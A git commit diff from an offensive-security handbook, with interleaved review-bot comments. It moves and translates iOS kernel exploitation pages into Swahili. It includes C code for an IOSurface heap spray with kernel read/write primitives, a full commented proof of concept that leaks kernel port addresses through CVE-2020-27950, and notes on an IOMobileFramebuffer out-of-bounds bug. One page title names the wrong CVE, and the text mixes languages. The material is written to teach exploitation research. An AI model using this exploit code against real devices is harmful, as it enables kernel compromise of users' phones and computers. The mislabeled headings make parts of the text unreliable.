Translated ['src/network-services-pentesting/pentesting-web/wordpress.md

This commit is contained in:
Translator 2025-09-26 01:12:32 +00:00
parent 3ccbb9fa77
commit efa111760f
26 changed files with 3153 additions and 1782 deletions

@ -768,7 +768,7 @@
- [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
- [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
- [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
- [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
- [ROP and JOP](binary-exploitation/rop-return-oriented-programing/README.md)
- [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
- [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
- [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
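Review bot: the only change in this hunk is a title swap, since both `- [ROP - Return Oriented Programing](...)` and `- [ROP and JOP](...)` point at the same `binary-exploitation/rop-return-oriented-programing/README.md` (the 7/7 line counts in the header indicate one line replaced by one line, with the rendered view having dropped the +/- markers). Check that the README's own first heading now reads "ROP and JOP" as well, otherwise the sidebar entry and the page title will disagree. The directory name keeps the `Programing` misspelling; renaming it would break inbound links, so the visible title is the right place to drop the typo and the path can stay.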
@ -838,7 +838,7 @@
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
# 🤖 AI
- [AI Security](AI/README.md)
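Review bot: repointing `- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)` away from `binary-exploitation/ios-exploiting.md` is consistent with the file deletion and the new `ios-exploiting/` pages further down, but this hunk adds no nested entries for those new CVE pages. If the book is built with mdBook (the `{{#include ...}}` directives suggest it), pages that are absent from SUMMARY.md are not rendered, so unless they are listed elsewhere in this commit they will be unreachable from the sidebar and left out of the build. Consider also leaving a stub or redirect at the old `ios-exploiting.md` path, because external links to the previous URL will otherwise break.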

@ -1,207 +0,0 @@
# iOS Exploiting
{{#include ../banners/hacktricks-training.md}}
## Physical use-after-free
Hii ni muhtasari kutoka kwa chapisho kutoka [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) zaidi ya hayo, taarifa zaidi kuhusu exploit inayotumia mbinu hii inaweza kupatikana katika [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
**Anwani ya nafasi ya kumbukumbu ya virtual** kwa michakato ya mtumiaji kwenye iOS inapanuka kutoka **0x0 hadi 0x8000000000**. Hata hivyo, anwani hizi hazihusiani moja kwa moja na kumbukumbu halisi. Badala yake, **kernel** hutumia **meza za kurasa** kutafsiri anwani za virtual kuwa anwani halisi za **kumbukumbu**.
#### Levels of Page Tables in iOS
Meza za kurasa zimeandaliwa kwa njia ya ngazi tatu:
1. **L1 Page Table (Ngazi ya 1)**:
* Kila kipengee hapa kinawakilisha anuwai kubwa ya kumbukumbu ya virtual.
* Inashughulikia **0x1000000000 bytes** (au **256 GB**) ya kumbukumbu ya virtual.
2. **L2 Page Table (Ngazi ya 2)**:
* Kipengee hapa kinawakilisha eneo dogo la kumbukumbu ya virtual, haswa **0x2000000 bytes** (32 MB).
* Kipengee cha L1 kinaweza kuelekeza kwenye meza ya L2 ikiwa hakiwezi kuunganisha eneo lote lenyewe.
3. **L3 Page Table (Ngazi ya 3)**:
* Hii ndiyo ngazi ya chini zaidi, ambapo kila kipengee kinaunganisha ukurasa mmoja wa kumbukumbu wa **4 KB**.
* Kipengee cha L2 kinaweza kuelekeza kwenye meza ya L3 ikiwa udhibiti wa kina unahitajika.
#### Mapping Virtual to Physical Memory
* **Direct Mapping (Block Mapping)**:
* Baadhi ya vipengee katika meza ya kurasa moja kwa moja **huunganisha anuwai ya anwani za virtual** na anuwai inayoendelea ya anwani halisi (kama njia fupi).
* **Pointer to Child Page Table**:
* Ikiwa udhibiti wa kina unahitajika, kipengee katika ngazi moja (mfano, L1) kinaweza kuelekeza kwenye **meza ya kurasa ya mtoto** katika ngazi inayofuata (mfano, L2).
#### Example: Mapping a Virtual Address
Hebu tuseme unajaribu kufikia anwani ya virtual **0x1000000000**:
1. **L1 Table**:
* Kernel inakagua kipengee cha meza ya L1 kinachohusiana na anwani hii ya virtual. Ikiwa ina **pointer kwa meza ya L2**, inaenda kwenye meza hiyo ya L2.
2. **L2 Table**:
* Kernel inakagua meza ya L2 kwa ramani ya kina zaidi. Ikiwa kipengee hiki kinaelekeza kwenye **meza ya L3**, inaendelea huko.
3. **L3 Table**:
* Kernel inatafuta kipengee cha mwisho cha L3, ambacho kinaelekeza kwenye **anwani halisi** ya ukurasa halisi wa kumbukumbu.
#### Example of Address Mapping
Ikiwa unaandika anwani halisi **0x800004000** kwenye index ya kwanza ya meza ya L2, basi:
* Anwani za virtual kutoka **0x1000000000** hadi **0x1002000000** zinaunganisha na anwani halisi kutoka **0x800004000** hadi **0x802004000**.
* Hii ni **block mapping** katika ngazi ya L2.
Vinginevyo, ikiwa kipengee cha L2 kinaelekeza kwenye meza ya L3:
* Kila ukurasa wa 4 KB katika anuwai ya anwani ya virtual **0x1000000000 -> 0x1002000000** utakuwa umeunganishwa na vipengee vya kibinafsi katika meza ya L3.
### Physical use-after-free
**Physical use-after-free** (UAF) hutokea wakati:
1. Mchakato **unapotoa** kumbukumbu fulani kama **inasomeka na kuandikwa**.
2. **Meza za kurasa** zinasasishwa ili kuunganisha kumbukumbu hii na anwani halisi maalum ambayo mchakato unaweza kufikia.
3. Mchakato **unafuta** (huru) kumbukumbu hiyo.
4. Hata hivyo, kutokana na **hitilafu**, kernel **inasahau kuondoa uhusiano** kutoka kwa meza za kurasa, ingawa inashiriki kumbukumbu halisi inayohusiana kama huru.
5. Kernel inaweza kisha **kutoa tena kumbukumbu halisi "iliyohifadhiwa"** kwa madhumuni mengine, kama **data ya kernel**.
6. Kwa kuwa uhusiano haukuondolewa, mchakato bado unaweza **kusoma na kuandika** kwenye kumbukumbu halisi hii.
Hii inamaanisha mchakato unaweza kufikia **kurasa za kumbukumbu ya kernel**, ambazo zinaweza kuwa na data au muundo wa nyeti, na hivyo kumruhusu mshambuliaji **kubadilisha kumbukumbu ya kernel**.
### Exploitation Strategy: Heap Spray
Kwa kuwa mshambuliaji hawezi kudhibiti ni kurasa zipi maalum za kernel zitakazotolewa kwa kumbukumbu iliyohifadhiwa, wanatumia mbinu inayoitwa **heap spray**:
1. Mshambuliaji **anaunda idadi kubwa ya vitu vya IOSurface** katika kumbukumbu ya kernel.
2. Kila kitu cha IOSurface kina **thamani ya kichawi** katika moja ya maeneo yake, ikifanya iwe rahisi kutambua.
3. Wanachunguza **kurasa zilizohifadhiwa** kuona ikiwa yoyote ya vitu hivi imeanguka kwenye ukurasa uliohifadhiwa.
4. Wanapokutana na kitu cha IOSurface kwenye ukurasa uliohifadhiwa, wanaweza kukitumia **kusoma na kuandika kumbukumbu ya kernel**.
Taarifa zaidi kuhusu hii katika [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: Mshambuliaji anaunda vitu vingi vya IOSurface vyenye kitambulisho maalum ("thamani ya kichawi").
2. **Scan Freed Pages**: Wanakagua ikiwa yoyote ya vitu imewekwa kwenye ukurasa uliohifadhiwa.
3. **Read/Write Kernel Memory**: Kwa kubadilisha maeneo katika kitu cha IOSurface, wanapata uwezo wa kufanya **kusoma na kuandika bila mipaka** katika kumbukumbu ya kernel. Hii inawaruhusu:
* Kutumia eneo moja kusoma **thamani yoyote ya 32-bit** katika kumbukumbu ya kernel.
* Kutumia eneo lingine kuandika **thamani za 64-bit**, na kufikia **primitive ya kusoma/kuandika ya kernel** thabiti.
Unda vitu vya IOSurface vyenye thamani ya kichawi IOSURFACE\_MAGIC ili baadaye kutafuta:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
```
Tafuta **`IOSurface`** vitu katika ukurasa mmoja wa kimwili ulioachiliwa:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
```
### Kufikia Kernel Read/Write na IOSurface
Baada ya kupata udhibiti wa kitu cha IOSurface katika kumbukumbu ya kernel (kilichopangwa kwenye ukurasa wa kimwili ulioachwa unaoweza kufikiwa kutoka kwa nafasi ya mtumiaji), tunaweza kukitumia kwa **operesheni za kusoma na kuandika za kernel zisizo na mipaka**.
**Sehemu Muhimu katika IOSurface**
Kitu cha IOSurface kina sehemu mbili muhimu:
1. **Pointer ya Hesabu ya Matumizi**: Inaruhusu **kusoma 32-bit**.
2. **Pointer ya Wakati wa Kijalala**: Inaruhusu **kuandika 64-bit**.
Kwa kubadilisha pointers hizi, tunaelekeza kwenye anwani zisizo na mipaka katika kumbukumbu ya kernel, na kuwezesha uwezo wa kusoma/kuandika.
#### Kernel Read ya 32-Bit
Ili kufanya kusoma:
1. Badilisha **pointer ya hesabu ya matumizi** ili kuelekeza kwenye anwani ya lengo minus offset ya 0x14-byte.
2. Tumia njia ya `get_use_count` kusoma thamani katika anwani hiyo.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
```
#### 64-Bit Kernel Write
Ili kufanya kuandika:
1. Badilisha **kiashiria cha muda kilichoorodheshwa** kwa anwani ya lengo.
2. Tumia njia ya `set_indexed_timestamp` kuandika thamani ya 64-bit.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### Muhtasari wa Mchakato wa Ulaghai
1. **Chochea Matumizi Baada ya Kuachiliwa**: Kurasa zilizofunguliwa zinapatikana kwa matumizi tena.
2. **Sambaza Vitu vya IOSurface**: Panga vitu vingi vya IOSurface vyenye "thamani ya uchawi" ya kipekee katika kumbukumbu ya kernel.
3. **Tambua IOSurface Inayopatikana**: Pata IOSurface kwenye ukurasa ulioachiliwa ambao unadhibiti.
4. **Tumia Matumizi Baada ya Kuachiliwa**: Badilisha viashiria katika kitu cha IOSurface ili kuwezesha **kusoma/kandika** kwa njia isiyo na mipaka kupitia mbinu za IOSurface.
Kwa kutumia hizi mbinu, ulaghai unatoa **kusoma 32-bit** na **kandika 64-bit** kwa kumbukumbu ya kernel. Hatua zaidi za jailbreak zinaweza kujumuisha mbinu za kusoma/kandika zenye uthabiti zaidi, ambazo zinaweza kuhitaji kupita kinga za ziada (mfano, PPL kwenye vifaa vya arm64e vya kisasa).
{{#include ../banners/hacktricks-training.md}}
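Review bot: this deletes the whole of `binary-exploitation/ios-exploiting.md` rather than editing it, which only works if the relocated copy lands at `ios-exploiting/README.md` (the path the SUMMARY hunk now points to) with its banner include changed to `../../banners/hacktricks-training.md` to account for the extra directory level. While the content is being moved, fix the two defects it carries in the spray code: `*nClients = (*nClients) += 1;` writes the same object twice in one expression without a sequence point (undefined behaviour in C) and should simply be `*nClients += 1;`, and `info` (used in `iosurface_krw` and in the read/write helpers) is never declared in any of the snippets, so a one-line note on where that global comes from would let the excerpt be read on its own.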

@ -0,0 +1,332 @@
# CVE-2021-30807: IOMobileFrameBuffer OOB
{{#include ../../banners/hacktricks-training.md}}
## Hitilafu
You have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), lakini kwa muhtasari:
Kila ujumbe wa Mach unaoupokelewa na kernel unamalizika na **"trailer"**: struct ya urefu wa kubadilika yenye metadata (seqno, sender token, audit token, context, access control data, labels...). Kernel **hutoa nafasi kila mara kwa trailer kubwa zaidi inayowezekana** (MAX_TRAILER_SIZE) katika buffer ya ujumbe, lakini **huanzisha tu baadhi ya maeneo**, kisha baadaye **huamua ni ukubwa gani wa trailer kurudishwa** kwa msingi wa **chaguzi za kupokea zinazodhibitiwa na mtumiaji**.
Hizi ndizo structs zinazohusiana na trailer:
```c
typedef struct{
mach_msg_trailer_type_t msgh_trailer_type;
mach_msg_trailer_size_t msgh_trailer_size;
} mach_msg_trailer_t;
typedef struct{
mach_msg_trailer_type_t msgh_trailer_type;
mach_msg_trailer_size_t msgh_trailer_size;
mach_port_seqno_t msgh_seqno;
security_token_t msgh_sender;
audit_token_t msgh_audit;
mach_port_context_t msgh_context;
int msgh_ad;
msg_labels_t msgh_labels;
} mach_msg_mac_trailer_t;
#define MACH_MSG_TRAILER_MINIMUM_SIZE sizeof(mach_msg_trailer_t)
typedef mach_msg_mac_trailer_t mach_msg_max_trailer_t;
#define MAX_TRAILER_SIZE ((mach_msg_size_t)sizeof(mach_msg_max_trailer_t))
```
Kisha, wakati trailer object inapotengenezwa, tu baadhi ya fields zimeanzishwa, na max trailer size daima imetengwa:
```c
trailer = (mach_msg_max_trailer_t *) ((vm_offset_t)kmsg->ikm_header + size);
trailer->msgh_sender = current_thread()->task->sec_token;
trailer->msgh_audit = current_thread()->task->audit_token;
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
[...]
trailer->msgh_labels.sender = 0;
```
Kisha, kwa mfano, unapojaribu kusoma mach message ukitumia `mach_msg()`, kazi `ipc_kmsg_add_trailer()` inaitwa ili kuongeza trailer kwenye ujumbe. Ndani ya kazi hii, ukubwa wa trailer unahesabiwa na baadhi ya viwanja vingine vya trailer hujazwa:
```c
if (!(option & MACH_RCV_TRAILER_MASK)) { [3]
return trailer->msgh_trailer_size;
}
trailer->msgh_seqno = seqno;
trailer->msgh_context = context;
trailer->msgh_trailer_size = REQUESTED_TRAILER_SIZE(thread_is_64bit_addr(thread), option);
```
Kigezo cha `option` kinadhibitiwa na mtumiaji, kwa hivyo **inahitajika kupeleka thamani inayopita ukaguzi wa `if`.**
Ili kupitisha ukaguzi huu tunahitaji kutuma `option` halali inayoungwa mkono:
```c
#define MACH_RCV_TRAILER_NULL 0
#define MACH_RCV_TRAILER_SEQNO 1
#define MACH_RCV_TRAILER_SENDER 2
#define MACH_RCV_TRAILER_AUDIT 3
#define MACH_RCV_TRAILER_CTX 4
#define MACH_RCV_TRAILER_AV 7
#define MACH_RCV_TRAILER_LABELS 8
#define MACH_RCV_TRAILER_TYPE(x) (((x) & 0xf) << 28)
#define MACH_RCV_TRAILER_ELEMENTS(x) (((x) & 0xf) << 24)
#define MACH_RCV_TRAILER_MASK ((0xf << 24))
```
Lakini, kwa sababu `MACH_RCV_TRAILER_MASK` inachunguza tu bits, tunaweza kupitisha thamani yoyote kati ya `0` na `8` ili kutoingia ndani ya kauli ya `if`.
Kisha, ukiendelea na msimbo utaona:
```c
if (GET_RCV_ELEMENTS(option) >= MACH_RCV_TRAILER_AV) {
trailer->msgh_ad = 0;
}
/*
* The ipc_kmsg_t holds a reference to the label of a label
* handle, not the port. We must get a reference to the port
* and a send right to copyout to the receiver.
*/
if (option & MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_LABELS)) {
trailer->msgh_labels.sender = 0;
}
done:
#ifdef __arm64__
ipc_kmsg_munge_trailer(trailer, real_trailer_out, thread_is_64bit_addr(thread));
#endif /* __arm64__ */
return trailer->msgh_trailer_size;
```
Hapa unaweza kuona kwamba ikiwa `option` ni kubwa au sawa na `MACH_RCV_TRAILER_AV` (7), uwanja **`msgh_ad`** umeanzishwa kwa `0`.
Kama ulivyogundua, **`msgh_ad`** bado ilikuwa uwanja pekee wa trailer ambao haukuanzishwa hapo awali na unaweza kuwa na leak kutoka kwa memory iliyotumika hapo awali.
Hivyo, njia ya kuepuka kuianzisha ni kupitisha thamani ya `option` kuwa `5` au `6`, hivyo itaenda kupitia ukaguzi wa kwanza wa `if` na haitajiingia kwenye `if` inayoiweka `msgh_ad` kwa sababu thamani `5` na `6` hazina aina yoyote ya trailer iliyohusishwa.
### Basic PoC
Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), you have a PoC to just leak some random data.
### Leak Kernel Address PoC
Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), kuna PoC ya ku-leak anwani ya kernel. Kwa hili, ujumbe uliojaa structs za `mach_msg_port_descriptor_t` unatumwa kwa sababu uwanja `name` wa muundo huu katika userland una unsigned int lakini katika kernel uwanja `name` ni pointer kwa struct `ipc_port`. Hivyo, kutuma kumi au zaidi ya structs hizi katika ujumbe wa kernel kutamaanisha **kuongeza anwani kadhaa za kernel ndani ya ujumbe** ili moja yao inaweza ku-leak.
Maelezo yaliongezwa kwa uelewa bora:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach/mach.h>
// Number of OOL port descriptors in the "big" message.
// This layout aims to fit messages into kalloc.1024 (empirically good on impacted builds).
#define LEAK_PORTS 50
// "Big" message: many descriptors → larger descriptor array in kmsg
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS];
} message_big_t;
// "Small" message: fewer descriptors → leaves more room for the trailer
// to overlap where descriptor pointers used to be in the reused kalloc chunk.
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS - 10];
} message_small_t;
int main(int argc, char *argv[]) {
mach_port_t port; // our local receive port (target of sends)
mach_port_t sent_port; // the port whose kernel address we want to leak
/*
* 1) Create a receive right and attach a send right so we can send to ourselves.
* This gives us predictable control over ipc_kmsg allocations when we send.
*/
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
/*
* 2) Create another receive port (sent_port). We'll reference this port
* in OOL descriptors so the kernel stores pointers to its ipc_port
* structure in the kmsg → those pointers are what we aim to leak.
*/
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &sent_port);
mach_port_insert_right(mach_task_self(), sent_port, sent_port, MACH_MSG_TYPE_MAKE_SEND);
printf("[*] Will get port %x address\n", sent_port);
message_big_t *big_message = NULL;
message_small_t *small_message = NULL;
// Compute userland sizes of our message structs
mach_msg_size_t big_size = (mach_msg_size_t)sizeof(*big_message);
mach_msg_size_t small_size = (mach_msg_size_t)sizeof(*small_message);
// Allocate user buffers for the two send messages (+MAX_TRAILER_SIZE for safety/margin)
big_message = malloc(big_size + MAX_TRAILER_SIZE);
small_message = malloc(small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
/*
* 3) Prepare the "big" message:
* - Complex bit set (has descriptors)
* - 50 OOL port descriptors, all pointing to the same sent_port
* When you send a Mach message with port descriptors, the kernel “copy-ins” the userland port names (integers in your processs IPC space) into an in-kernel ipc_kmsg_t, and resolves each name to the actual kernel object (an ipc_port).
* Inside the kernel message, the header/descriptor area holds object pointers, not user names. On the way out (to the receiver), XNU “copy-outs” and converts those pointers back into names. This is explicitly documented in the copyout path: “the remote/local port fields contain port names instead of object pointers” (meaning they were pointers in-kernel).
*/
printf("[*] Creating first kalloc.1024 ipc_kmsg\n");
memset(big_message, 0, big_size + MAX_TRAILER_SIZE);
big_message->header.msgh_remote_port = port; // send to our receive right
big_message->header.msgh_size = big_size;
big_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
| MACH_MSGH_BITS_COMPLEX;
big_message->body.msgh_descriptor_count = LEAK_PORTS;
for (int i = 0; i < LEAK_PORTS; i++) {
big_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
big_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
big_message->sent_ports[i].name = sent_port; // repeated to fill array with pointers
}
/*
* 4) Prepare the "small" message:
* - Fewer descriptors (LEAK_PORTS-10) so that, when the kalloc.1024 chunk is reused,
* the trailer sits earlier and *overlaps* bytes where descriptor pointers lived.
*/
printf("[*] Creating second kalloc.1024 ipc_kmsg\n");
memset(small_message, 0, small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
small_message->header.msgh_remote_port = port;
small_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
| MACH_MSGH_BITS_COMPLEX;
small_message->body.msgh_descriptor_count = LEAK_PORTS - 10;
for (int i = 0; i < LEAK_PORTS - 10; i++) {
small_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
small_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
small_message->sent_ports[i].name = sent_port;
}
/*
* 5) Receive buffer for reading back messages with trailers.
* We'll request a *max-size* trailer via MACH_RCV_TRAILER_ELEMENTS(5).
* On vulnerable kernels, field `msgh_ad` (in mac trailer) may be left uninitialized
* if the requested elements value is < MACH_RCV_TRAILER_AV, causing stale bytes to leak.
*/
uint8_t *buffer = malloc(big_size + MAX_TRAILER_SIZE);
mach_msg_mac_trailer_t *trailer; // interpret the tail as a "mac trailer" (format 0 / 64-bit variant internally)
uintptr_t sent_port_address = 0; // we'll build the 64-bit pointer from two 4-byte leaks
/*
* ---------- Exploitation sequence ----------
*
* Step A: Send the "big" message → allocate a kalloc.1024 ipc_kmsg that contains many
* kernel pointers (ipc_port*) in its descriptor array.
*/
printf("[*] Sending message 1\n");
mach_msg(&big_message->header,
MACH_SEND_MSG,
big_size, // send size
0, // no receive
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step B: Immediately receive/discard it with a zero-sized buffer.
* This frees the kalloc chunk without copying descriptors back,
* leaving the kernel pointers resident in freed memory (stale).
*/
printf("[*] Discarding message 1\n");
mach_msg((mach_msg_header_t *)0,
MACH_RCV_MSG, // try to receive
0, // send size 0
0, // recv size 0 (forces error/free path)
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step C: Reuse the same size-class with the "small" message (fewer descriptors).
* We slightly bump msgh_size by +4 so that when the kernel appends
* the trailer, the trailer's uninitialized field `msgh_ad` overlaps
* the low 4 bytes of a stale ipc_port* pointer from the prior message.
*/
small_message->header.msgh_size = small_size + sizeof(uint32_t); // +4 to shift overlap window
printf("[*] Sending message 2\n");
mach_msg(&small_message->header,
MACH_SEND_MSG,
small_size + sizeof(uint32_t),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
/*
* Step D: Receive message 2 and request an invalid trailer elements value (5).
* - Bits 24..27 (MACH_RCV_TRAILER_MASK) are nonzero → the kernel computes a trailer.
* - Elements=5 doesn't match any valid enum → REQUESTED_TRAILER_SIZE(...) falls back to max size.
* - BUT init of certain fields (like `ad`) is guarded by >= MACH_RCV_TRAILER_AV (7),
* so with 5, `msgh_ad` remains uninitialized → stale bytes leak.
*/
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
printf("[*] Reading back message 2\n");
mach_msg((mach_msg_header_t *)buffer,
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5), // core of CVE-2020-27950
0,
small_size + sizeof(uint32_t) + MAX_TRAILER_SIZE, // ensure room for max trailer
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
// Trailer begins right after the message body we sent (small_size + 4)
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t));
// Leak low 32 bits from msgh_ad (stale data → expected to be the low dword of an ipc_port*)
sent_port_address |= (uint32_t)trailer->msgh_ad;
/*
* Step E: Repeat the A→D cycle but now shift by another +4 bytes.
* This moves the overlap window so `msgh_ad` captures the high 4 bytes.
*/
printf("[*] Sending message 3\n");
mach_msg(&big_message->header, MACH_SEND_MSG, big_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
printf("[*] Discarding message 3\n");
mach_msg((mach_msg_header_t *)0, MACH_RCV_MSG, 0, 0, port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
// add another +4 to msgh_size → total +8 shift from the baseline
small_message->header.msgh_size = small_size + sizeof(uint32_t)*2;
printf("[*] Sending message 4\n");
mach_msg(&small_message->header,
MACH_SEND_MSG,
small_size + sizeof(uint32_t)*2,
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
printf("[*] Reading back message 4\n");
mach_msg((mach_msg_header_t *)buffer,
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5),
0,
small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE,
port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t)*2);
// Combine the high 32 bits, reconstructing the full 64-bit kernel pointer
sent_port_address |= ((uintptr_t)trailer->msgh_ad) << 32;
printf("[+] Port %x has address %lX\n", sent_port, sent_port_address);
return 0;
}
```
## Marejeo
- [Synacktiv's blog post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak)
{{#include ../../banners/hacktricks-training.md}}
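Review bot: the new file's title `# CVE-2021-30807: IOMobileFrameBuffer OOB` does not describe its content: everything under it, from the Synacktiv link through the `// core of CVE-2020-27950` comment in the PoC to the reference list, is about the Mach message trailer leak CVE-2020-27950 (`ipc_kmsg_add_trailer()` leaving `msgh_ad` uninitialised), so the heading looks copied from the sibling IOMobileFrameBuffer page and should be replaced with one naming CVE-2020-27950 and the trailer leak. In the PoC, `memset` is called but only `stdio.h`, `stdlib.h`, `unistd.h` and `mach/mach.h` are included; add `#include <string.h>`, since an implicit declaration is an error on current clang. The surrounding prose also mixes languages (`## Hitilafu` and `## Marejeo` beside `Inside the [original post](...), you have a PoC to just leak some random data.`), which should be made consistent with the rest of the translated page.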

@ -0,0 +1,297 @@
# CVE-2021-30807: IOMobileFrameBuffer OOB
{{#include ../../banners/hacktricks-training.md}}
## Hitilafu
Una [maelezo mazuri ya udhaifu hapa](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), lakini kwa muhtasari:
- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. Hii method inapata kigezo kinachodhibitiwa na mtumiaji ambacho hakikaguliwi kwa namna yoyote na kinapitia kwa function inayofuata kama **`scalar0`**.
- That method forwards into **`IOMobileFramebufferLegacy::get_displayed_surface(this, task*, out_id, scalar0)`**, where **`scalar0`** (thamani ya **32-bit** inayodhibitiwa na mtumiaji) is used as an **index** into an internal **array of pointers** without **any bounds check**:
> `ptr = *(this + 0xA58 + scalar0 * 8);` → passed to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)` as an **`IOSurface*`**.\
> **Matokeo:** **OOB pointer read & type confusion** on that array. If the pointer isn't valid, the kernel deref panics → **DoS**.
> [!NOTE]
> This was fixed in **iOS/iPadOS 14.7.1**, **macOS Big Sur 11.5.1**, **watchOS 7.6.1**
> [!WARNING]
